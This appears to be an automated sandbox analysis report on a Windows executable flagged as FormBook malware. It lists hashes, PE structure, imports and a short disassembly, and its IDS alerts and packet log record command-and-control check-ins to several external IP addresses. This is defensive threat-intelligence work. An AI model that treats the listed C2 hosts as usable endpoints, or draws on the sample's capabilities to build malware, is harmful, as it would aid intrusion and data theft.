SHA256:	f1a074590a5ab17256abba47cb364ef182c4082f08d63a22f0cb21f438f72aa1
SHA512:	79562572fda0aec409927783ce295e5ecc88558306006d2d6b1f1ea6950e3521c58f2d859975015d515edf2b754c0f5ac0dfd0380e7dc8f7547e94c6624027c7
SSDEEP:	24576:cu6J33O0c+JY5UZ+XC0kGso6FaUwsnhd+G1BX+juTkWY:Gu0c++OCvkGs9FaUwshd+G1BOiY
TLSH:	1145AF12B38DC2A1DE275273BE6DA7102D7B3C590174F51F2E883D3999B2262117EE63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	82a88c96a29a8e53

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67601EEA [Mon Dec 16 12:36:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE734735B0Ah
jmp 00007FE7347288D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE734728A5Ah
cmp edi, eax
jc 00007FE734728DBEh
bt dword ptr [004C31FCh], 01h
jnc 00007FE734728A59h
rep movsb
jmp 00007FE734728D6Ch
cmp ecx, 00000080h
jc 00007FE734728C24h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE734728A60h
bt dword ptr [004BE324h], 01h
jc 00007FE734728F30h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE734728BFDh
test edi, 00000003h
jne 00007FE734728C0Eh
test esi, 00000003h
jne 00007FE734728BEDh
bt edi, 02h
jnc 00007FE734728A5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE734728A63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE734728AB5h
bt esi, 03h
jnc 00007FE734728B08h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x6f39c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x137000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x6f39c	0x6f400	a2ea61f8e81cc0699839e3985261e79c	False	0.8004125702247191	data	7.730446664696211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x137000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7518	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7640	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc7768	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7890	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	Great Britain	0.6781914893617021
RT_ICON	0xc7cf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	Great Britain	0.4383208255159475
RT_ICON	0xc8da0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	Great Britain	0.33070539419087136
RT_ICON	0xcb348	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	Great Britain	0.2756849315068493
RT_ICON	0xcf570	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	Great Britain	0.09768721164083757
RT_MENU	0xdfd98	0x50	data	English	Great Britain	0.9
RT_STRING	0xdfde8	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xe037c	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xe0a08	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xe0e98	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xe1494	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe1af0	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe1f58	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe20b0	0x53d97	data			1.0003231939717045
RT_GROUP_ICON	0x135e48	0x4c	data	English	Great Britain	0.8157894736842105
RT_GROUP_ICON	0x135e94	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x135ea8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x135ebc	0x14	data	English	Great Britain	1.25
RT_VERSION	0x135ed0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x135fac	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T19:52:08.318615+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49707	103.117.135.13	80	TCP
2025-01-10T19:52:41.172928+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49811	185.151.30.223	80	TCP
2025-01-10T19:52:43.738102+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49828	185.151.30.223	80	TCP
2025-01-10T19:52:46.290405+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49844	185.151.30.223	80	TCP
2025-01-10T19:52:48.826085+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49858	185.151.30.223	80	TCP
2025-01-10T19:52:54.489504+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49895	199.59.243.228	80	TCP
2025-01-10T19:52:57.039329+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49912	199.59.243.228	80	TCP
2025-01-10T19:52:59.565959+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49930	199.59.243.228	80	TCP
2025-01-10T19:53:02.114668+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49946	199.59.243.228	80	TCP
2025-01-10T19:53:07.902035+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49972	46.38.243.234	80	TCP
2025-01-10T19:53:11.400053+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49984	46.38.243.234	80	TCP
2025-01-10T19:53:13.078571+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49985	46.38.243.234	80	TCP
2025-01-10T19:53:15.750180+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49986	46.38.243.234	80	TCP
2025-01-10T19:53:21.749900+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49987	176.57.65.76	80	TCP
2025-01-10T19:53:24.277708+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49988	176.57.65.76	80	TCP
2025-01-10T19:53:27.117650+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49989	176.57.65.76	80	TCP
2025-01-10T19:53:29.774196+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49990	176.57.65.76	80	TCP
2025-01-10T19:53:48.544480+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49991	209.74.79.42	80	TCP
2025-01-10T19:53:51.111413+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49992	209.74.79.42	80	TCP
2025-01-10T19:53:53.620814+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49993	209.74.79.42	80	TCP
2025-01-10T19:53:57.032431+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49994	209.74.79.42	80	TCP
2025-01-10T19:54:03.931185+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49995	198.2.214.227	80	TCP
2025-01-10T19:54:05.948298+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49996	198.2.214.227	80	TCP
2025-01-10T19:54:08.534074+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.11	49997	198.2.214.227	80	TCP
2025-01-10T19:54:11.098053+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.11	49998	198.2.214.227	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:52:07.402120113 CET	49707	80	192.168.2.11	103.117.135.13
Jan 10, 2025 19:52:07.407011986 CET	80	49707	103.117.135.13	192.168.2.11
Jan 10, 2025 19:52:07.407212973 CET	49707	80	192.168.2.11	103.117.135.13
Jan 10, 2025 19:52:07.426215887 CET	49707	80	192.168.2.11	103.117.135.13
Jan 10, 2025 19:52:07.431143045 CET	80	49707	103.117.135.13	192.168.2.11
Jan 10, 2025 19:52:08.318289995 CET	80	49707	103.117.135.13	192.168.2.11
Jan 10, 2025 19:52:08.318339109 CET	80	49707	103.117.135.13	192.168.2.11
Jan 10, 2025 19:52:08.318614960 CET	49707	80	192.168.2.11	103.117.135.13
Jan 10, 2025 19:52:08.324012995 CET	49707	80	192.168.2.11	103.117.135.13
Jan 10, 2025 19:52:08.329574108 CET	80	49707	103.117.135.13	192.168.2.11
Jan 10, 2025 19:52:40.374912977 CET	49811	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:40.379895926 CET	80	49811	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:40.379981041 CET	49811	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:40.402579069 CET	49811	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:40.407352924 CET	80	49811	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:41.172581911 CET	80	49811	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:41.172739029 CET	80	49811	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:41.172928095 CET	49811	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:41.915393114 CET	49811	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:42.934221983 CET	49828	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:42.939239025 CET	80	49828	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:42.939332962 CET	49828	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:42.957777023 CET	49828	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:42.962640047 CET	80	49828	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:43.737863064 CET	80	49828	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:43.737943888 CET	80	49828	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:43.738101959 CET	49828	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:44.462344885 CET	49828	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:45.481046915 CET	49844	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:45.485872984 CET	80	49844	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:45.485950947 CET	49844	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:45.501924038 CET	49844	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:45.506738901 CET	80	49844	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:45.506922960 CET	80	49844	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:46.289457083 CET	80	49844	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:46.290194035 CET	80	49844	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:46.290405035 CET	49844	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:47.011967897 CET	49844	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.028160095 CET	49858	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.032967091 CET	80	49858	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:48.033097029 CET	49858	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.042443991 CET	49858	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.047380924 CET	80	49858	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:48.825884104 CET	80	49858	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:48.825923920 CET	80	49858	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:48.826085091 CET	49858	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.829272985 CET	49858	80	192.168.2.11	185.151.30.223
Jan 10, 2025 19:52:48.834081888 CET	80	49858	185.151.30.223	192.168.2.11
Jan 10, 2025 19:52:54.014266968 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:54.019073963 CET	80	49895	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:54.019165039 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:54.034864902 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:54.039727926 CET	80	49895	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:54.489393950 CET	80	49895	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:54.489437103 CET	80	49895	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:54.489473104 CET	80	49895	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:54.489504099 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:54.489526987 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:55.540358067 CET	49895	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:56.558983088 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:56.563882113 CET	80	49912	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:56.564009905 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:56.578552961 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:56.583616018 CET	80	49912	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:57.039153099 CET	80	49912	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:57.039179087 CET	80	49912	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:57.039199114 CET	80	49912	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:57.039329052 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:57.039329052 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:58.087336063 CET	49912	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:59.105843067 CET	49930	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:59.110753059 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.110836983 CET	49930	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:59.127347946 CET	49930	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:52:59.132138014 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.132323980 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.565756083 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.565783978 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.565795898 CET	80	49930	199.59.243.228	192.168.2.11
Jan 10, 2025 19:52:59.565958977 CET	49930	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:00.634177923 CET	49930	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:01.652798891 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:01.660074949 CET	80	49946	199.59.243.228	192.168.2.11
Jan 10, 2025 19:53:01.660176039 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:01.669591904 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:01.674455881 CET	80	49946	199.59.243.228	192.168.2.11
Jan 10, 2025 19:53:02.114497900 CET	80	49946	199.59.243.228	192.168.2.11
